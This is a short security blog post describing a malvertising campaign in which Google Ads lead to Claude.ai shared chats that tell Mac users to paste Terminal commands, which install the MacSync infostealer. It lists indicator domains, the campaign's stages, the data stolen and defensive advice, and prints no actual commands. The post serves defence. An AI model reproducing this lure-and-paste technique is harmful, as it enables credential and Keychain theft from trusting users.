Hackers Abuse Google Ads and Claude.ai Chats to Push Mac Malware

May 11, 2026 Faeem BLOGS 0

Overview A new malvertising campaign is abusing Google Ads and Claude.ai shared chats to trick macOS users into installing malware. Unlike traditional phishing sites, attackers are hosting malicious instructions directly inside Claude’s legitimate chat feature, making the destination URL appear genuine.

Attack Flow

  • Google Ads: Sponsored results for “Claude mac download” point to claude.ai, but lead to malicious shared chats.
  • Shared Chats Weaponized: Attackers pose as “Apple Support,” instructing users to paste commands into Terminal.
  • Payload Delivery:
    • Base64‑encoded shell scripts downloaded from domains like customroofingcontractors[.]com and bernasibutuwqu2[.]com.
    • Scripts run entirely in memory, using polymorphic delivery (unique obfuscation per request) to evade detection.
    • Profiling step checks keyboard locale (e.g., Russian/CIS) before proceeding.
    • Second‑stage payload executed via osascript, giving attackers remote code execution.

Malware Capabilities

  • Variant 1 (profiling): Collects victim IP, hostname, OS version, and locale before payload delivery.
  • Variant 2 (direct execution): Skips profiling, immediately harvests:
    • Browser credentials & cookies.
    • macOS Keychain contents.
    • Exfiltrates data to attacker servers (e.g., briskinternet[.]com).
  • Identified as a variant of MacSync infostealer.

Why It’s Dangerous

  • No Fake Domain: Ads point to Anthropic’s real domain, claude.ai.
  • Social Engineering: Non‑technical users are more likely to trust instructions inside a legitimate AI chat.
  • Broader Trend: Similar campaigns have targeted GIMP, Homebrew, ChatGPT, and Grok users.

Defensive Guidance

  • Download Safely: Navigate directly to claude.ai or official documentation for installers.
  • Avoid Terminal Commands: Treat any unsolicited instructions to paste commands with extreme caution.
  • Monitor Systems: Check for suspicious processes masquerading as system binaries (e.g., /usr/libexec/upowerd).
  • Credential Hygiene: Reset browser and Keychain credentials if suspicious installers were executed.

Final Thought

This campaign shows how attackers are weaponizing trust in AI platforms. By embedding malicious instructions inside legitimate Claude chats, they bypass traditional phishing red flags. For defenders, the lesson is clear:

Be the first to comment

Leave a Reply

Your email address will not be published.


*


This site uses Akismet to reduce spam. Learn how your comment data is processed.